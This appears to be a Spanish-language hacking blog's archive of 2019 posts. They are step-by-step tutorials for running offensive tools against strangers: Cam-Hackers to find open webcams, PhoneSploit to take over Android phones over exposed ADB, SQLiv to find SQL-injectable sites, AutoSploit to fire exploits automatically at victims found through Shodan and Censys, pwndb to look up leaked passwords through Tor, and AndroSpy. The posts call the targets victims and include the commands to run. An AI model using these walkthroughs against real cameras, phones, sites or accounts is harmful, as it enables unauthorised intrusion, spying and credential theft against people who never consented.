viernes, 22 de noviembre de 2019

Cam-Hackers


Hola amigos:

Hoy, vamos a presentar un script que he conocido hace unos días, el cual, nos sirve para hackear cámaras de seguridad.

En primer lugar, debemos instalar, si no lo hemos hecho ya, python3 y git

apt-get install python3

apt-get install git

En segundo lugar, clonamos


Una vez clonado, nos vamos al directorio creado y ejecutamos

python3 cam-hackers.py



De esta manera, saldrán direcciones IP de webcams que están abiertas.




viernes, 20 de septiembre de 2019

Tutorial Shodan eye


Hola amigos.

Después de tanto tiempo sin escribir, pues me estoy dedicando a estudiar, sobre todo programación, he decidido hablaros un poquito sobre shodan eye, un script que me he encontrado hoy y que, como podéis suponer por el nombre, se utilizará para buscar dispositivos del IoT (Internet de las Cosas).

En primer lugar, nos descargaremos dicho script en el siguiente enlace:


Nos metemos en el directorio que ha creado

cd shodan-eye

Instalamos los requerimientos

pip install -r requirements.txt



Bien, antes de iniciarlo, necesitaremos ir a shodan.io y crearnos una cuenta, si es que no la tenemos ya.

Una vez creada, nos iremos al apartado Account, y encontraremos una riestra de letras y números, llamado API Key.

Bien, no cierres el navegador y vuelve a la consola, donde ejecutarás ya es script

python shodan_eye.py



Es el momento de poner esa riestra, llamada API Key.



Aquí, pondremos los dorks, para buscar, por ejemplo, buscaremos máquinas con Windows XP conectados a Internet.

[+] Enter your keyword(s): Windows XP



viernes, 31 de mayo de 2019

Tutorial PhoneSploit


Hola amigos.

Hoy, os presento PhoneSploit, herramienta con la que explotaremos ADB.

¿Qué es ADB?, ADB (Android Debug Bridge) es una herramienta de tipo cliente servidor, que permite abrir una ventana de comandos (o una interfaz gráfica) de un dispositivo Android, para poder administrarlo.

Con ADB podemos actualizar Android desde un archivo OTA (Archivos de actualización Over The Air, la forma más sencilla de actualizar el sistema, las que te llegan a las notificaciones de tu Android), instalar APKs, etc.

En primer lugar os recomiendo tener instalados rar, android-sdk y adb

apt-get install rar

apt-get install android-sdk

apt-get install adb

Posteriormente clonamos PhoneSploit


Nos metemos en el directorio de PhoneSploit

cd PhoneSploit

Descomprimimos adb.rar

rar x adb.rar

Ahora, hacermos una copia de seguridad main.py

cp main.py main2.py

editamos main.py

leafpad main.py

Cambiamos las líneas (Si vas a usar el script en Windows, no hace falta)

coloring_file = open(CurrentDir+"\\install\\coloring.txt", "a+")
line = open(CurrentDir+"\\install\\coloring.txt", "a+").readline()

open(CurrentDir+"\\install\\coloring.txt", "w").close()

os.chdir(CurrentDir+"//adb")

Por

coloring_file = open(CurrentDir+"/install/coloring.txt", "a+")
line = open(CurrentDir+"/install/coloring.txt", "a+").readline()
open(CurrentDir+"/install/coloring.txt", "w").close()

os.chdir(CurrentDir+"/adb")

Guardamos y cerramos.

python2 main.py



Selecciono, en mi caso, L.



Le digo que Y, porque lo instalé con apt-get install adb



Si ves un mensaje previo a esta imagen:

error: no devices/emulators found
sh: 1: cls: not found

No te alarmes. Todo va correctamente.

De acuerdo, vamos ahora a buscar dispositivos con el puerto ADB abierto


<imagen 4>

Ahora, en nuestra terminal, seleccionamos

phonesploit(main_menu) > 3

Enter a phones ip address.
phonesploit(connect_phone) > ip_VICTIMA
connected to ip_VICTIMA

Y ya podemos jugar.

Cuando nos pida “device name”, deberemos introducir ip_VICTIMA:5555

Ya que 5555 es el puerto en el que corre 5555.

miércoles, 8 de mayo de 2019

Buscando páginas vulnerables a SQLi con SQLiv


Hola amigos.

En este post, veremos cómo buscar páginas web vulnerables a sqli. Para ello, nos ayudaremos de la aplicación sqliv

En primer lugar, nos la descargamos:




Instalamos

python2 setup.py -i

python2 sqliv.py -d "inurl:index.php?id=" -e google

Si os sale el error
Traceback (most recent call last):
File "sqliv.py", line 8, in <module>
from src import std
File "/root/sqliv/src/std.py", line 5, in <module>
from termcolor import colored, cprint
ImportError: No module named termcolor

debéis instalar el módulo correspondiente, en este caso

pip install termcolor

otros que quizá deberéis instalar para ejecutar el script:


pip install terminaltables
pip install nyawc


viernes, 15 de febrero de 2019

Autosploit


Hola amigos.

En esta ocasión, os presento la herramienta Autosploit.

Esta herramienta, nos permitirá, automáticamente, lanzar los exploits hacia un objetivo, sin que nosotros tengamos que hacer casi nada, sólo buscar un objetivo y ponerlo.

Por si fuera poco, esta herramienta nos ayuda a buscar víctimas a través de shodan y censys, por lo que es necesario tener una cuenta de ambas. Y, cuando lo pida, meter los parámetros.

Descargamos la herramienta:




cd AutoSploit

./install.sh





python autosploit.py



Respondemos y

Y metemos los tokens tanto de shodan y de censys.

Si queremos buscar víctimas con shodan, por ejemplo:

search shodan android



Te dará un archivo hosts.txt con los hosts encontrados.

Bien, ahora busquemos

search shodan smb

Busquemos una dirección de hosts.txt y pongamos

exploit IPVICTIMA IP_ATACANTE LPORT

Y automáticamente lanzará exploits



Si queréis poner un proxy (por ejemplo habéis instalado tor https://salamancageek.blogspot.com/2016/03/intalando-tor.html) y os dá problemas, lo que tenéis que hacer es iniciar tor y privoxy e ir a la configuración de red de vuestro KALI LINUX u otra distribución GNU/LINUX y hacer pasar todas las conexiones por el proxy.



sábado, 2 de febrero de 2019

pwndb

 
Hola amigos:

En el post de hoy, vamos a ver las contraseñas de usuarios de internet.
Existen bases de datos de usuarios y contraseñas que se han ido sacando del hackeo de distintas plataformas o usuarios. Con esta aplicación podremos acceder a una de las primeras.

Nos descargamos el script

git clone https://github.com/davidtavarez/pwndb.git




Nos metemos en el directorio creado

Instalamos:

apt-get install virtualenv

Tecleamos: 

virtualenv venv

Running virtualenv with interpreter /usr/bin/python2
New python executable in /root/pwndb/env/bin/python2
Also creating executable in /root/pwndb/env/bin/python
Installing setuptools, pkg_resources, pip, wheel...done.

Nos metemos en /venv/bin/activate

Tecleamos:
 
source activate

Y nos aparecerá a la izquierda (env).

Ahora pon lo siguiente:

(env) root@kali:~/pwndb/env/bin# pip install -r /root/pwndb/requirements.txt

DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7.
Collecting PySocks==1.6.8 (from -r /root/pwndb/requirements.txt (line 1))
Downloading https://files.pythonhosted.org/packages/53/12/6bf1d764f128636cef7408e8156b7235b150ea31650d0260969215bb8e7d/PySocks-1.6.8.tar.gz (283kB)
100% |████████████████████████████████| 286kB 4.4MB/s
Building wheels for collected packages: PySocks
Building wheel for PySocks (setup.py) ... done
Stored in directory: /root/.cache/pip/wheels/22/5c/b5/12e0dfdfa85bea67b23628b6425fae715c687e947a45ee3df9
Successfully built PySocks
Installing collected packages: PySocks
Successfully installed PySocks-1.6.8

Volvemos al directorio /root/pwndb/
cd /root/pwnd/

inicia tor:

service tor start
service privoxy start

Ahora ejecuta:

python pwndb.py -u usuario -d dominio

A partir de ahora, puedes ejecutar pwndb.py solamente con python pwndb.py, sin tener que hacer source activate ni nada.

Si te sale el error:

socks.ProxyConnectionError: Error connecting to SOCKS5 proxy 127.0.0.1:9150: [Errno 111] Connection refused
edita pwndb.py y busca
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9150)

Cámbia 9150 por 9050 (que será el puerto que tengas de tor para socks5)

Guarda y cierra.


jueves, 3 de enero de 2019

AndroSpy


Hola amigos.

Hoy, os voy a presentar la herramienta Androspy, una app para hackear un teléfono android.

En primer lugar, descargamos:




cd Androspy



chmod +x setup.sh

chmod +x androspy.sh




./setup.sh



./androspy.sh